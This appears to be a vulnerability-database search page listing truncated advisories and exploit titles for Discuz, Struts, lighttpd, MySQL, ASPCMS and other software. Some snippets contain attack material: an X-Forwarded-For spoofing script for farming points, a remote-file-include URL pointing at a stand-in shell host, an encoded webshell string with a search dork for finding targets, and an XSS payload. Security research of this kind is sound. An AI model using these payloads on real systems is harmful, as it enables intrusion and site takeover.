56796 matches found
Discuz推广功能任意刷分
简要描述: DZ的访问加分的推广功能存在缺陷 详细说明: 这里是定义IP的地方 当XFORWARDEDFOR头存在并且不为那几种情况时使用这个作为IP地址 因为推广积分是跟访问IP有关的,所以只要修改XFORWARDEDFOR就可以任意刷积分了 漏洞证明: array'method' = "GET",'ignoreerrors'=true, 'header' = "XFORWARDEDFOR: $ip"; $url = "http://www.xxx.com/forum.php?fromuid=3007"; $contents =...
lighttpd畸形HTTP Connection域处理拒绝服务漏洞
CVECAN ID: CVE-2012-5533 lighttpd是一款开源的轻量级Web服务器。 lighttpd 1.4.31在处理某些HTTP请求头时,"httprequestsplitvalue"函数src/request.c在处理特制的"Connection"报头域时会陷入无限循环。攻击者利用此漏洞可导致Lighttpd拒绝服务。 0 lighttpd 1.4.31 厂商补丁: Lighttpd -------- 目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:...
Multiple Vendors libc:fts_*() Local Denial of Service Exploit
No description provided by source. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 libc:fts:multiple vendors, Denial-of-service Author: Maksymilian Arciemowicz SecurityReason.com Date: - - Dis.: 21.10.2008 - - Pub.: 04.03.2009 CVE: CVE-2009-0537 We are going informing all vendors, about this proble...
yappa-ng <= 2.3.1 (admin_modules) Remote File Include Vulnerability
No description provided by source. ============================================================================================== yappa-ng = v2.3.1 adminmodules Remote File Inclusion Exploit =============================================================================================== Critical...
Mikrotik Winbox 任意文件访问漏洞
In April 23rd 2018, Mikrotik fixed a vulnerability “that allowed gaining access to an unsecured router”. myself and @yalpanian of BASU CERT reverse engineering lab tried to figure out what exactly got fixed, what was the problem in the first place and how severe was the impact of it. UPDATE: full...
S2-046: Struts 2 Remote Code Execution vulnerability(CVE-2017-5638)
It is possible to perform a RCE attack with a malicious Content-Disposition value or with improper Content-Length header. If the Content-Dispostion / Content-Length value is not valid an exception is thrown which is then used to display an error message to a user. This is a different vector for t...
用友NC-IUFO系统 /epp/detail/publishinfodetail.jsp SQL注入漏洞
No description provided by source...
cmstop媒体云sql注入漏洞(1)-order by 注入技巧
简要描述: 今天无聊就多看了一会儿媒体云的产品,order by 后面的注入技巧 详细说明: 其他说明见: WooYun: cmstop媒体云SQL注入漏洞 同样的cmstop 媒体云的注入 注册账号后,在选择链接分类的时候,会发生如下链接 http://site.cmstop.cn/link/index/list?type=1&offset=0&limit=50&=1440172313381&sort=desc&category=2 但是其中的sort参数过滤不严格,导致了一个order by后面的mysql注入...
科讯网校系统xss漏洞(密码为MD5加密)
简要描述: 大CMS厂商。。 http://www.kesion.com/ 已有 469,628 个网站选择KESION产品搭建,今日新增网站 104 个 拿了好多证书。 详细说明: 首先在他们网站 http://e.kesion.com/model/view.aspx?mid=3&id=4373 我目测只要有回复框就百分百存在这漏洞 而且全站判断的方式一样 为什么这样说呢 往下面看就知道了 http://e.kesion.com/model/view.aspx?mid=3&id=4373 2014年司法考试历年真题课件-民法 OK...
XTACACSD report() 缓冲区溢出漏洞
No description provided by source...
lighttpd 1.4.31 Denial of Service PoC
No description provided by source. !/bin/bash Exploit Title: simple lighttpd 1.4.31 DOS POC Date: 11/21/2012 Exploit Author: [email protected] Vendor Homepage: http://www.lighttpd.net Software Link: http://download.lighttpd.net/lighttpd/releases-1.4.x/lighttpd-1.4.31.tar.gz Version: 1.4.31 Tested on:...
doyo 2.3 /template.php 本地文件包含漏洞
DOYO在template传参时,由于Template.php对传入文件路径的处理不当,逻辑错误,导致可包含任意文件(含相对路径)。 doyo 2.3...
ASPCMS留言板插马
简要描述: 朋友丢来一个程序,看着看着就发现了一个漏洞,ASPCMS最新版本直接拿shell,应该很多人早就发现了。 详细说明: google关键字:powered by ASPCMS 大概有几十页网站,基本上都可以拿下,aspcms主要是信息发布系统,影响版本为asp。漏洞成因,在留言板处对信息处理不当,导致代码注入。可直接将一句话木马插入数据库。 数据库默认配置为asp.目录在/data/data.asp下。 利用方法,保证默认数据库路径末更改及可留言,就算不能留言,可构造,经测试,九成的末更改: 在留言的标题处插入:┼攠數畣整爠煥敵瑳∨≡┩愾 这样就往数据库中插入了一句话,密码为a...
MailEnable WebAdmin绕过认证漏洞
MailEnable是一款商业性质的POP3和SMTP服务器。 MailEnable的WebAdmin登录进程实现上存在安全漏洞,攻击者可能利用此漏洞无需口令便可成功登录,获得非授权访问。 MailEnable MailEnable Professional Edition 2.32 MailEnable MailEnable Enterprise Edition 2.32 目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载: http://www.mailenable.com/hotfix/ME-10019.ZIP...
Apache mod_rewrite模块单字节缓冲区溢出漏洞
Apache是一款开放源代码WEB服务程序。 Apache的modrewrite模块在转义绝对URI主题时存在单字节缓冲区溢出漏洞,攻击者可能利用此漏洞在服务器上执行任意指令。 modrewrite模块的escapeabsoluteuri函数分离LDAP URL中的令牌时,会导致在字符指针数组以外写入指向用户控制数据的指针,这样就可能完全控制受影响的主机。 Apache Group Apache 2.2.x = 2.2.0 Apache Group Apache 2.0.x = 2.0.46 Apache Group Apache 1.3.x = 1.3.28 临时解决方法:...
Mambo phpShop Component <= 1.2 RC2b File Include Vulnerability
No description provided by source. Affected Application: Mambo phpShop v1.2 RC2b Mambo CMS Component . . : contact : . . . . . . . . . . . . . . . . . . . . . . . . . . . Discoverd/Found by: Charles Nelwan a.k.a Cmaster4 Team: BatamHacker irc.dal.net crew URL: http://www.batamhacker.info/forum...
泛微 OA /js/swfupload/swfupload.swf xss漏洞
No description provided by source...
Hikvision iVMS-8700 Tomcat 任意文件创建漏洞
No description provided by source...
YXcms越权修改任意用户资料,获取任意用户密码
简要描述: YXcms建站系统修改用户资料时,对用户身份没有进行验证,导致越权操作 详细说明: 1、涉及版本YXcms1.2.6 2、下载地址:http://www.yxcms.net/ 系统演示地址:http://demo.yxcms.net/index.html 3、用户完善自己资料内容时,系统根据用户id在后台进行操作。但用户id的设置只是简单的数字,因此通过修改id,我们可以修改任意用户的资料信息。 漏洞证明: 1、登录系统,进入会员中心,在资料完善模块填写要修改的用户基本资料。 2、为了演示漏洞,我们注册了一个id为1的被攻击账户,抓包修改id为被攻击者的id,即为1。...
Gopherd <= 3.0.5 FTP Gateway Remote Overflow Exploit
No description provided by source. / UMN gopherd2.x.x/3.x.x: remote ftp gateway buffer overflow. by: vade79/v9 v9 at fakehalo.deadpig.org fakehalo/realhalo three years since last audit, code is a little more secure. but, still found a few potentially exploitable situations. this exploits the ftp...
MySQL CREATE TABLE调用绕过访问限制漏洞
CVE ID: CVE-2008-7247 MySQL是一款使用非常广泛的开放源代码关系数据库系统,拥有各种平台的运行版本。 当数据主目录包含有到不同文件系统的符号链接时,MySQL的ql/sqltable.cc允许通过认证的远程攻击者通过以特殊DATA DIRECTORY或INDEX DIRECTORY参数调用CREATE TABLE绕过预期的访问限制,执行各种非授权操作。 MySQL AB MySQL 6.0 MySQL AB MySQL 5.1.x MySQL AB MySQL 5.0.x 厂商补丁: MySQL AB --------...
D-Link DNS-320 命令注入漏洞(CVE-2020-25506)
...
Tenda AC15 Router - Unauthenticated Remote Code Execution(CVE-2018-5767)
INTRODUCTION In this post we will be presenting a pre-authenticated remote code execution vulnerability present in Tenda’s AC15 router. We start by analysing the vulnerability, before moving on to our regular pattern of exploit development – identifying problems and then fixing those in turn to...
Zorum 3.5 DBProperty.PHP Remote File Include Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/20606/info Zorum is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. A successful exploit of this issue allows an attacker to execute arbitrary server-side script cod...
Discuz! 6.0.0&6.1.0 spache.php SQL注入漏洞
No description provided by source...
flinx <= 1.3 (category.php id) Remote SQL Injection Vulnerability
No description provided by source. -------------------------------------------------------------- H-T Team HouSSaMix + ToXiC350 + RxH -------------------------------------------------------------- Author : Houssamix From H-T Team Script : flinx 1.3 & below Download :...
MS Windows Color Management Module Overflow Exploit (MS05-036) (2)
No description provided by source. / \ MS05-036 ICC Stack Overflow Exploit / by Darkeagle \ / GreetZ: all unl0ckerz, ed, f0st, uf0, sowhat, str0ke, black, redsand \ / \ special tnx to snooq for his PoC. / \ / xploit was tested on WinXP SP1 RUS with explorer.exe \ / 02.08.05 \ /...
Chrome 远程代码执行漏洞(CVE-2021-21220)
...
Remote Code Execution on the Smiths Medical Medfusion 4000
Remote Code Execution on the Smiths Medical Medfusion 4000 In which we detail the process of vulnerability research on a life critical embedded system: a medical infusion pump. Table of Contents Remote Code Execution on the Smiths Medical Medfusion 4000 Table of Contents Summary Introduction Why ...
BinGo News <= 3.01 (bnrep) Remote File Include Vulnerability
在文件bpncom.php中,未对包含对象参数bnrep做过滤导致远程文件包含漏洞,代码如下 include $bnrep."bnconfigs.php"; 可导致远程文件包含如下: http://example.com/path/bpncom.php?bnrep=http://SHELLURL.COM...
ISC BIND 9 Large RRSIG RRsets远程拒绝服务漏洞
BUGTRAQ ID: 48007 CVECAN ID: CVE-2011-1910 BIND是一个应用非常广泛的DNS协议的实现,由ISC负责维护,具体的开发由Nominum公司完成。 ISC BIND 9在实现上存在远程拒绝服务漏洞,远程攻击者可利用此漏洞造成应用程序进程崩溃,拒绝服务合法用户。 由于错误的处理了某些源记录集RRsets, 攻击者可用过大的RRSIG RRsets设置DNSSEC签署的授权DNS服务器作为触发器,然后向缓存解析器请求故障服务器服务的域中不存在的名称,获取的回应将触发漏洞。 FreeBSD FreeBSD 8.x FreeBSD FreeBSD 7.x...
Apache 'mod_proxy_http' Interim Response Denial of Service Vulnerability
CVE: CVE-2008-2364 The Apache 'modproxyhttp' module is prone to a denial-of-service vulnerability that affects the processing of interim responses. Attackers may exploit this issue to cause denial-of-service conditions. Reportedly, the issue affects Apache 2.2.8 and 2.0.63; other versions may als...
WordPress WP-FeedStats HTML注入漏洞
WordPress是一款基于WEB的网络日记程序。 WordPress不正确过滤用户提的输入,远程攻击者可以利用漏洞进行HTML注入攻击,获得敏感信息。 问题是'WP-FeedStats'脚本对用户提交的WEB参数缺少过滤,提交恶意脚本代码作为参数数据,并诱使用户访问,可获得目标用户敏感信息。 WP-FeedStats 2.1 目前没有解决方案提供: http://bueltge.de/wp-feedstats-de-plugin/171/ http://www.example.com/wp1/?feed=rss2&scriptalert1/script...
Cisco Adaptive Security Appliance - Path Traversal (CVE-2018-0296)
!/usr/bin/python -- coding: utf-8 -- from pocsuite.net import req from pocsuite.poc import POCBase, Output from pocsuite.utils import register import urlparse class TestPOCPOCBase: name = "Cisco Adaptive Security Appliance - Path Traversal" vulID = 'CVE-2018-0296' author = 'sebao' vulType = 'Path...
泛微OA系统日志泄露漏洞
No description provided by source...
Ticimax E-Ticaret (SQL Injection)
No description provided by source. Exploit Title: Ticimax E-Ticaret SQL Injection Date: 01.06.2010 Author: Neuromancer Version: app version CVE : if exists Code : exploit code Author: Neuromancer contact : msnatneurom4ncerdotcom From : TURKEY Ticimax e-ticaret Kategori.asp, urundetay.aspLocal SQL...
Yellow Swordfish Simple Forum 1.x 'topic' Parameter SQL Injection Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/27825/info Simple Forum is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise...
用友某产品Struts命令执行漏洞(可导致金融、保险、基金等行业用户受到影响)
简要描述: 用友客服系统某产品命令执行漏洞(涉及金融、保险、基金等行业用户) 详细说明: 用友的客服系统存在最新的struts命令执行漏洞 涉及金融、保险、基金等行业用户 中国大地保险...
Oracle MySQL Server 'InnoDB'子组件远程安全漏洞(CVE-2013-0368)
BUGTRAQ ID: 57397 CVECAN ID: CVE-2013-0368 Oracle MySQL Server是一个轻量的关系型数据库系统。 Oracle MySQL Server 5.5.28及更早版本存在远程安全漏洞,可通过'MySQL Protocol'协议利用此漏洞。'InnoDB'子组件受到影响。通过身份验证的远程攻击者可利用此漏洞进行攻击从而影响MySQL Server的可用性。 0 Oracle MySQL Server = 5.5.28 厂商补丁: Oracle ------...
MySQL空两进制字符串远程拒绝服务漏洞
BUGTRAQ ID: 31081br / CVE ID:CVE-2008-3963br / CNCVE ID:CNCVE-20082358br / br / MySQL是一款开放源代码的数据库应用程序。br / MySQL处理空两进制值存在问题,远程攻击者可以利用漏洞使服务程序崩溃。br / 通过Mysql客户端提交如下查询:br / select b'';br / 可导致服务程序崩溃。br / MySQL AB MySQL 6.0.4 MySQL AB MySQL 5.1.23 MySQL AB MySQL 5.0.60 可升级到最新版本:...
Lucee Server 未授权RCE漏洞(CVE-2021-21307)
Finding 0day to hack Apple Getting started We started hacking on Apple after the infamous blog post by Sam, et al. The goal was to focus on critical findings such as PII exposure or getting access to Apple's servers/internal network. These are the types of bugs we thought Apple would be most...
杰奇小说连载系统(JieqiCMS) V1.7 /modules/article/packdown.php 文件 cid 参数任意文件下载漏洞
No description provided by source...
Struts2/XWork < 2.2.0 - Remote Command Execution Vulnerability
漏洞详情 在struts2中,DefaultActionMapper类支持以"action:"、"redirect:"、"redirectAction:"作为导航或是重定向前缀,但是这些前缀后面同时可以跟OGNL表达式,由于struts2没有对这些前缀做过滤,导致利用OGNL表达式调用java静态方法执行任意系统命令。 这里以“redirect:”前缀举例,struts2会将“redirect:”前缀后面的内容设置到redirect.location当中,这里我们一步步跟踪,首先是这个getMapping函数跟入 这里一直到这个handleSpecialParameters,继续跟入...
PHP-Nuke 7.0/8.1/8.1.35 - Wormable Remote Code Execution
No description provided by source. !/usr/bin/php ?php / Wormable Remote Code Execution in PHP-Nuke 7.0/8.1/8.1.35newist as of release Vendor's Website:http://phpnuke.org/ Secuirty Researcher: Michael Brooks https://sitewat.ch Original Advisory:...
PostgreSQL安全限制绕过漏洞
BUGTRAQ ID: 65723 CVECAN ID: CVE-2014-0060 PostgreSQL是一款高级对象-关系型数据库管理系统,支持扩展的SQL标准子集。 PostgreSQL 9.3.3, 9.2.7, 9.1.12, 9.0.16, 8.4.20之前版本在实现上存在安全漏洞,“GRANT ... WITHOUT ADMIN OPTION”限制可被绕过,攻击者可利用此漏洞获取管理员权限,撤销其他用户的访问权限。 0 PostgreSQL PostgreSQL 8.x 厂商补丁: PostgreSQL ----------...
PHP "php_register_variable_ex()"函数任意代码执行漏洞(CVE-2012-0830)
CVE-2012-0830 Php是一款流行的编程语言 PHP在12月为哈希碰撞拒绝服务CVE-2011-4885http://sebug.net/vuldb/ssvid-30001提供的补丁引出了另一个严重的安全漏洞。 防止哈希碰撞的补丁在php.ini中引入了新的配置属性: maxinputvars 此配置元素限制用于请求中使用的变量数量如http://request.com/foo.php?a=1&b=2&c=3,默认设置为1000。...
Microsoft IIS FTP服务器递归列表拒绝服务漏洞
BUGTRAQ ID: 36273 CVECAN ID: CVE-2009-2521 Microsoft Internet信息服务(IIS)是Microsoft Windows自带的一个网络信息服务器,其中包含HTTP服务功能。 IIS的FTPd的Glob功能在处理递归目录列表请求时存在栈溢出漏洞,拥有对目录写访问权限的远程攻击者可以通过提交包含有通配符(如“”)的请求触发这个溢出,导致FTP服务崩溃。 Microsoft IIS 7.0 Microsoft IIS 6.0 Microsoft IIS 5.1 Microsoft IIS 5.0 厂商补丁: Microsoft...
Apache HTTP Server AllowOverride选项绕过安全限制漏洞
BUGTRAQ ID: 35115 CVECAN ID: CVE-2009-1195 Apache HTTP Server是一款流行的Web服务器。 Apache HTTP Server没有正确地处理AllowOverride指令中的Options=IncludesNOEXEC选项,本地用户可以通过在.htaccess文件中配置1 Options Includes、2 Options +Includes或3 Options +IncludesNOEXEC并在.shtml文件中注入exec元素导致绕过安全限制获得权限。 Apache 2.2.x 厂商补丁: Apache Group...
deV!L`z Clanportal 1.5 - Mullti Vulnerability
No description provided by source...
Check Point FireWall-1 PKI Web服务远程溢出漏洞
BUGTRAQ ID: 34286 Check Point Firewall-1是一款高性能防火墙。 Check Point Firewall-1中默认监听于TCP 18264端口上的PKI Web服务存在缓冲区溢出漏洞。如果远程攻击者向该服务发送了包含有超长Authorization或Referer头的特制HTTP请求的话,就可以触发这个溢出,导致执行任意代码。 Check Point Software Firewall-1 Check Point Software --------------------...